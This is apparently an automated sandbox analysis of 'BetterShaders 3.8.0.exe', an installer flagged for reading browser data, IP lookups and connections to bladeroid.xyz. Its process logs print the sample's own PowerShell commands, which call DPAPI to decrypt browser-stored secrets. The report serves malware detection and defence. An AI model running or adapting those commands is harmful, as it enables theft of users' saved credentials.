Analysis Overview
SHA256
c0c47f91e18fc087051c2172c74ae96e14e01fadb12af47d3e301e99e22da8c1
Threat Level: Shows suspicious behavior
The file BetterShaders 3.8.0.exe was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Reads user/profile data of web browsers
Loads dropped DLL
Checks computer location settings
Looks up external IP address via web service
An obfuscated cmd.exe command-line is typically used to evade detection.
Program crash
Unsigned PE
Enumerates physical storage devices
Kills process with taskkill
Modifies Internet Explorer settings
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Opens file in notepad (likely ransom note)
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Enumerates processes with tasklist
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-27 14:35
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win7-20240508-en
Max time kernel
121s
Max time network
124s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 220
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win10v2004-20240508-en
Max time kernel
150s
Max time network
115s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipapi.co | N/A | N/A |
| N/A | ipapi.co | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\BetterShaders 3.8.0.exe
"C:\Users\Admin\AppData\Local\Temp\BetterShaders 3.8.0.exe"
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,33,156,90,107,92,234,10,181,133,211,213,132,225,131,203,19,43,3,49,39,190,150,249,21,61,57,49,200,210,141,111,17,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,214,130,109,140,61,204,74,148,189,62,217,154,132,189,29,160,26,234,209,30,83,79,12,6,129,130,103,41,196,208,66,54,48,0,0,0,236,8,218,121,146,205,107,71,207,134,9,211,133,7,82,203,50,134,32,93,11,238,254,63,23,243,203,194,220,127,112,141,162,163,30,223,124,74,182,37,157,68,135,13,26,90,83,83,64,0,0,0,236,16,138,167,200,115,64,250,162,134,117,14,7,53,89,144,157,205,82,149,198,14,40,220,234,159,129,235,18,113,4,59,0,212,17,133,25,130,151,144,176,122,34,55,195,60,202,67,224,172,20,174,133,84,215,190,203,254,174,41,10,104,192,145), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,33,156,90,107,92,234,10,181,133,211,213,132,225,131,203,19,43,3,49,39,190,150,249,21,61,57,49,200,210,141,111,17,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,214,130,109,140,61,204,74,148,189,62,217,154,132,189,29,160,26,234,209,30,83,79,12,6,129,130,103,41,196,208,66,54,48,0,0,0,236,8,218,121,146,205,107,71,207,134,9,211,133,7,82,203,50,134,32,93,11,238,254,63,23,243,203,194,220,127,112,141,162,163,30,223,124,74,182,37,157,68,135,13,26,90,83,83,64,0,0,0,236,16,138,167,200,115,64,250,162,134,117,14,7,53,89,144,157,205,82,149,198,14,40,220,234,159,129,235,18,113,4,59,0,212,17,133,25,130,151,144,176,122,34,55,195,60,202,67,224,172,20,174,133,84,215,190,203,254,174,41,10,104,192,145), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,169,185,211,78,126,178,233,113,146,165,226,217,166,46,54,58,7,126,2,46,52,51,8,33,165,252,252,33,23,55,170,117,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,17,11,201,141,126,201,93,71,249,169,78,142,80,33,175,239,206,207,106,1,120,226,109,40,148,210,70,217,136,37,103,93,48,0,0,0,196,143,154,93,178,189,8,54,194,213,193,83,116,53,243,111,111,77,200,213,127,10,114,6,231,115,160,210,133,174,254,89,248,212,39,71,125,70,83,162,94,87,174,78,120,53,111,193,64,0,0,0,230,177,176,152,136,15,179,107,163,31,172,7,147,247,157,248,126,206,103,252,231,212,64,164,231,127,156,232,77,46,46,112,8,236,160,141,113,40,61,129,30,155,244,246,72,26,227,154,16,181,136,68,101,194,90,66,46,20,238,131,114,189,199,162), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,169,185,211,78,126,178,233,113,146,165,226,217,166,46,54,58,7,126,2,46,52,51,8,33,165,252,252,33,23,55,170,117,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,17,11,201,141,126,201,93,71,249,169,78,142,80,33,175,239,206,207,106,1,120,226,109,40,148,210,70,217,136,37,103,93,48,0,0,0,196,143,154,93,178,189,8,54,194,213,193,83,116,53,243,111,111,77,200,213,127,10,114,6,231,115,160,210,133,174,254,89,248,212,39,71,125,70,83,162,94,87,174,78,120,53,111,193,64,0,0,0,230,177,176,152,136,15,179,107,163,31,172,7,147,247,157,248,126,206,103,252,231,212,64,164,231,127,156,232,77,46,46,112,8,236,160,141,113,40,61,129,30,155,244,246,72,26,227,154,16,181,136,68,101,194,90,66,46,20,238,131,114,189,199,162), $null, 'CurrentUser')
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe
"C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1960,i,286725663950501444,13712487493729718754,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1952 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe
"C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --field-trial-handle=2160,i,286725663950501444,13712487493729718754,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:3
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe
"C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2536,i,286725663950501444,13712487493729718754,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1280 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bladeroid.xyz | udp |
| US | 8.8.8.8:53 | ipapi.co | udp |
| US | 104.26.9.44:443 | ipapi.co | tcp |
| US | 172.67.214.44:443 | bladeroid.xyz | tcp |
| US | 172.67.214.44:443 | bladeroid.xyz | tcp |
| US | 172.67.214.44:443 | bladeroid.xyz | tcp |
| US | 172.67.214.44:443 | bladeroid.xyz | tcp |
| US | 172.67.214.44:443 | bladeroid.xyz | tcp |
| US | 8.8.8.8:53 | 44.9.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.214.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\System.dll
| MD5 | 0d7ad4f45dc6f5aa87f606d0331c6901 |
| SHA1 | 48df0911f0484cbe2a8cdd5362140b63c41ee457 |
| SHA256 | 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca |
| SHA512 | c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\nsis7z.dll
| MD5 | 80e44ce4895304c6a3a831310fbf8cd0 |
| SHA1 | 36bd49ae21c460be5753a904b4501f1abca53508 |
| SHA256 | b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592 |
| SHA512 | c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\chrome_100_percent.pak
| MD5 | 6c2827fe702f454c8452a72ea0faf53c |
| SHA1 | 881f297efcbabfa52dd4cfe5bd2433a5568cc564 |
| SHA256 | 2fb9826a1b43c84c08f26c4b4556c6520f8f5eef8ab1c83011031eb2d83d6663 |
| SHA512 | 5619ad3fca8ea51b24ea759f42685c8dc7769dd3b8774d8be1917e0a25fa17e8a544f6882617b4faa63c6c4f29844b515d07db965c8ea50d5d491cdda7281fc5 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\chrome_200_percent.pak
| MD5 | 77088f98a0f7ea522795baec5c930d03 |
| SHA1 | 9b272f152e19c478fcbd7eacf7356c3d601350ed |
| SHA256 | 83d9243037b2f7e62d0fdfce19ca72e488c18e9691961e2d191e84fb3f2f7a5d |
| SHA512 | 5b19115422d3133e81f17eedbacee4c8e140970120419d6bbfe0e99cf5528d513eea6583548fa8a6259b260d73fab77758ad95137b61fe9056101dd5772e8f4a |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\d3dcompiler_47.dll
| MD5 | a7b7470c347f84365ffe1b2072b4f95c |
| SHA1 | 57a96f6fb326ba65b7f7016242132b3f9464c7a3 |
| SHA256 | af7b99be1b8770c0e4d18e43b04e81d11bdeb667fa6b07ade7a88f4c5676bf9a |
| SHA512 | 83391a219631f750499fd9642d59ec80fb377c378997b302d10762e83325551bb97c1086b181fff0521b1ca933e518eab71a44a3578a23691f215ebb1dce463d |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\icudtl.dat
| MD5 | 74bded81ce10a426df54da39cfa132ff |
| SHA1 | eb26bcc7d24be42bd8cfbded53bd62d605989bbf |
| SHA256 | 7bf96c193befbf23514401f8f6568076450ade52dd1595b85e4dfcf3de5f6fb9 |
| SHA512 | bd7b7b52d31803b2d4b1fd8cb76481931ed8abb98d779b893d3965231177bdd33386461e1a820b384712013904da094e3cd15ee24a679ddc766132677a8be54a |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\ffmpeg.dll
| MD5 | 3b74a017d60d588937ccb7453ee3df14 |
| SHA1 | 37505b193d45986daccb3e4c44f40675d0b4c40a |
| SHA256 | 395fc47fdafec2e93c3534da579393466703ff6f9380ca6d2c2e7628462d40ce |
| SHA512 | 38efc1f695375bc6599848b4a5d10aba8571c618b8ecc3a007dd953c9e724e9d7839eb27e2cefd2c482bd9f5f363733563a592b8fa8af16e311644e44bab0872 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\LICENSE.electron.txt
| MD5 | 4d42118d35941e0f664dddbd83f633c5 |
| SHA1 | 2b21ec5f20fe961d15f2b58efb1368e66d202e5c |
| SHA256 | 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d |
| SHA512 | 3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\libGLESv2.dll
| MD5 | 7b6eb3934932d133f25cfda71c2cf129 |
| SHA1 | da9dfc18f03667bdc950b11cdb7db31d2417d27c |
| SHA256 | bb4625ec2c0811fc55f66904567035d8533d6a3b88250ee2dd848cbccd6c5dbb |
| SHA512 | 059d97edb4ff4d380ce1c955312ea38509560f279b560108e7237197e80172bf38da0eda7f821efaeaf6106366faa0c5b29497f973773ee16c9eb41d5eda1b8d |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\libEGL.dll
| MD5 | c7e24104c3d3e96b15fd0e309208f6d5 |
| SHA1 | 974f73ce194123d7a024aa1dcfa3cbf9f0ceec0c |
| SHA256 | 5264e6461af122eced8ef3ce198c1c40851839d987f1e974e5c760dd847b9552 |
| SHA512 | e7d8203c895aaff2e29d870979fecb2b1ccf8334fa494341bde95cebb80f51893998ed65526dd433daad7a600dc14c97417c7069cc3db9516f741280d11609b0 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\LICENSES.chromium.html
| MD5 | b620990ddbd932d6475152e5a833860e |
| SHA1 | 70de0b3d7ffa77900f685c1788b32997a61ec386 |
| SHA256 | 921452a09f92f10da4cfef0521acd6ee6c689c630661ed35189e793de2c99fc5 |
| SHA512 | ba84b5e6281dd64d5da41d0db35942b6c0b1ee6b47d24dedd5006be40b2d22d90f58dc653e17893347900fb1bfcd37b0f2fff5b532175ccacc3b63d98fe42ac7 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\vulkan-1.dll
| MD5 | fb8cb93daa4650ff759a96108c972bc9 |
| SHA1 | 5bc7321f696a198496f9adac4246d139b7a5ca2e |
| SHA256 | 3389cf4e90f961466f4d0a226e649de628a537f0c2c1f6f444473f8330d94c57 |
| SHA512 | f05270c24583e3141fbceec64761156d561b8dcd334cfdaf2a42e5cedb478f1f75b42341b2bdb0e0daa011d0d1701890e91e8c110c90b06d664bde932a5f5560 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\vk_swiftshader_icd.json
| MD5 | 8642dd3a87e2de6e991fae08458e302b |
| SHA1 | 9c06735c31cec00600fd763a92f8112d085bd12a |
| SHA256 | 32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9 |
| SHA512 | f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\vk_swiftshader.dll
| MD5 | 063f0a33deddca0a6599386c12ee57a5 |
| SHA1 | 6e05dfdfa7d5e5f35b593662227055011356ab19 |
| SHA256 | 1bcf8e101bc58413bf7d64fb757cd2627b91a2b7830213657a1f0237b1a4980d |
| SHA512 | 15eb123bffde32d4d2ca22802320ecd697d091824949019420c082c2d57767aa04728874dc79bd02835e88ec7b4104f3553b4f09478cfee066273cdaacd916b2 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\v8_context_snapshot.bin
| MD5 | 936a529299d925f06181035c01c3fc71 |
| SHA1 | 1795ff36f04aeb830dc47c7648890bc4040eb711 |
| SHA256 | 7249d4a31a52cdb29031445b9ccbe0ec2ff1b86c947fc16f8a0a96d5bd071898 |
| SHA512 | 60fc3fa4ecef679bd1041e5c072c97ef907a0f6026aa00616cfdc69e4458cadcd2812ce0871a1aae13a5196357dbc3325589e00084bf8cbbf791db9e077a79e6 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\snapshot_blob.bin
| MD5 | f7c9b4ea6c9d3e22236cb9aef84bb6c5 |
| SHA1 | 56d24d42dd338ece109c11ed2ed06f4b25d5a100 |
| SHA256 | 43ef9734d64580cc3dd0b9eb4f17ef69fe44945f1e34cb1342537facfc25d641 |
| SHA512 | a640e365950b9cc2d8b44650b21f88f483da39ea16261b5b5f59a14d9a97aa388551c2fbf44820324b23a0b97d8ff1f442582dbe19c3e03db4c183b680bf50a7 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\resources.pak
| MD5 | 65b03275e42049efcdb1d51da6dc43db |
| SHA1 | ec69b7de36ca9876ba63005a67f6a204203b7834 |
| SHA256 | 5e5a08f2b85927312b2cb9e0930e7af7099825d5783d470d40deff5bd0ebaf25 |
| SHA512 | 731a0252a4970904dc4c706f1183fbe39b06e85267f1b165a529165d3b2d748cc2d944249c9ed8ad69827c929185fbc5b83963ad37b98f940ba12b448ddb58f0 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\af.pak
| MD5 | 94af96b7f60a4cfb9d596cd8927ba37d |
| SHA1 | 556833517bc6ad77b5427000f2c3dccad91b92e6 |
| SHA256 | 716e296c2f663ad90cdde85c5134582fc2305e5ebe10649fc9653bea533500a6 |
| SHA512 | 6605688a373a358ff1dfbeda1c09dd031e4a63de662555f5304843c31eb3afcedbc8ffa4dae8ddc1483b04ea24cb709ecc639a9902caa68731d8e44d04cdbd83 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\am.pak
| MD5 | 34b24f035bad74764b7cc57420488180 |
| SHA1 | fac3fdba1a94d7676ac4d71447178cfbd1fa4e82 |
| SHA256 | 9cff5c4af5997b45fb2a384bd73560e56bcb7710149e1a7e3e172d64e6eda025 |
| SHA512 | a01da4c45c6295a57248603f01a6b6231c4ce400aa3ec94e4228b26e8cea995c31d52b2008f99d0f17482aad80f1d67725c32e0f37cad6b012b1022ecde998f0 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\ar.pak
| MD5 | 83121a8093e7a335c577f11eaf101794 |
| SHA1 | 4716966d9793e02b28573acab943453ab56dd441 |
| SHA256 | 245410cc95c79310cbe9755530d6be829b9fbb3bd70f90c9531d933fe803e44e |
| SHA512 | 117f9231cb3b1fdf6db70d0222098c4fe7ef2505db021b2f27225b58a6e22228d6cca48fc7d7693272d26ffec32244d090f64f2a5c900419f0d1ffa28b877d14 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\bn.pak
| MD5 | 696016f43190747d63befa354d76e50b |
| SHA1 | 3399e641930b820b627a4e28dea0a79fc457f929 |
| SHA256 | 1e49980f89360b395a70e844ccd0c43b3a34eab84461b1499e7621f757149e3e |
| SHA512 | 3966fcc5988ceeb4dca79c0053fb428e5180029d44704faa4723334c69413a6eacf622e637857c1dcc096e129dd84e2369e4595ea50316cf8eb68696611a8430 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\bg.pak
| MD5 | d08e8e493f0b3c8ab19070ab05a78af8 |
| SHA1 | c5fa430269dc2d32baa6885de2453fa84c36f2fc |
| SHA256 | d223e994ad1aa6e747507187f724cdede8c369d2e8e0def50c4a6c912dba3880 |
| SHA512 | 4b415fa2ae6ba399674f90ea67e571d90a35fff1ce93df77f20bf692b52c92bfc41e5a3622776e3979b1662fecd2d9665209d5d1d53ece1bff3ed01a28e499d8 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\ca.pak
| MD5 | 7ad12fe9117cd590312cd7d0b867de33 |
| SHA1 | f71a25d4dc5cb8b5f2bf58db5f3e4cfbc2aaaf66 |
| SHA256 | 8f8511f02b6a1ea3022592d34b74abef93a5560567b09076b332961ab5a6236a |
| SHA512 | 5b823124d4b0e424a80a0d4508baf5e892c6c44f56c432956c44817d4ac74895be1d10637c22838fffd7f06047d36e7849553e08ae808bf9ec7d37ab123f5692 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\da.pak
| MD5 | a97f00b4bd958876ac55e9a3c73e7c79 |
| SHA1 | 0a019a4e1077dbb735bacf7b19374bbeec1a3e6f |
| SHA256 | 247790939c3e549ebcc079b872ba8f3b9645875c0bae26fc49b36d9bf73c3b82 |
| SHA512 | fd6d89f016b679e3f4afad590a591e592eaf4a147b7d7566a745a695cadc51957c5df06d0d60d52de00f434d8d8a5fdc27aa5ae29086762c5fc4615f4302a10e |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\de.pak
| MD5 | 0e434b38cfd98a0979a4373b6ffd1b8d |
| SHA1 | cda239ac9cbe2b93597940cad6f8554ae61bc5b4 |
| SHA256 | e1a2f20da317a6a7790dc0b2832d6533aa451a4cb2e06cf1a46525db26c96b12 |
| SHA512 | 00b00aa6420dd0f7849144bc7b1d6e8ac93fe2cd759d196c5eb143a4950fe0a3af9f468fc6d952d347fc9706fffad0d5744ab5e276b4b1e0cdc5b445c90197a8 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\cs.pak
| MD5 | c0b5c8b3e46c715f313ee78a788401ca |
| SHA1 | 5a59b4c2214f52c63f6e8c7ef7a11662c30a1ff9 |
| SHA256 | f7eafc84e6e55fc7dcfbc749e0b7bbd7cf051390bef3dbc37f2cdeecf92637e0 |
| SHA512 | b6a28846601ee937b21dc5e7c3b19e612b2a654e4de7e9dd7943f7b981ca6c3a1c86a93ce6a4b801debbbfbf71fdb243ca81e56163d44b2bc0fe8415ca5a55c4 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\el.pak
| MD5 | 271c3234e3a07223e6db8f6ab1c18f92 |
| SHA1 | dbc1ecc686eda75627f3fa60d034ea4021da0acf |
| SHA256 | 58ca76aa55e11a475c830ac89010d4431f455f531079c1e8a0943490b4dd8e4b |
| SHA512 | 50e6fab168889a283e26eacd7731367032db41841f39fef0f99543b98266c3784ee62a956cd4415c83a6fb7451b3f618f4f3dcf9807cf9b0f2f595ce26e24aac |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\en-US.pak
| MD5 | 88bbc725e7eedf18ef1e54e98f86f696 |
| SHA1 | 831d6402443fc366758f478e55647a9baa0aa42f |
| SHA256 | 95fd54494d992d46e72dad420ceee86e170527b94d77bfaaa2bfc01f83902795 |
| SHA512 | 92a5c6cfc2d88272bb5144e7ee5c48337f2c42083bc9777506b738e3bcb8f5a2c34af00c4ccc63b24fb158c79f69e7205b398c9e22634dae554410450978a2c4 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\en-GB.pak
| MD5 | 161d0ee49ed171ea8491ceb6c994d176 |
| SHA1 | 1d85de03cc44eb4f78738006ccef4e5809ff8015 |
| SHA256 | 77a6578635a0cd3a89ff11116fa819ecb6b2609bf8e9ba92c687711c92c4e143 |
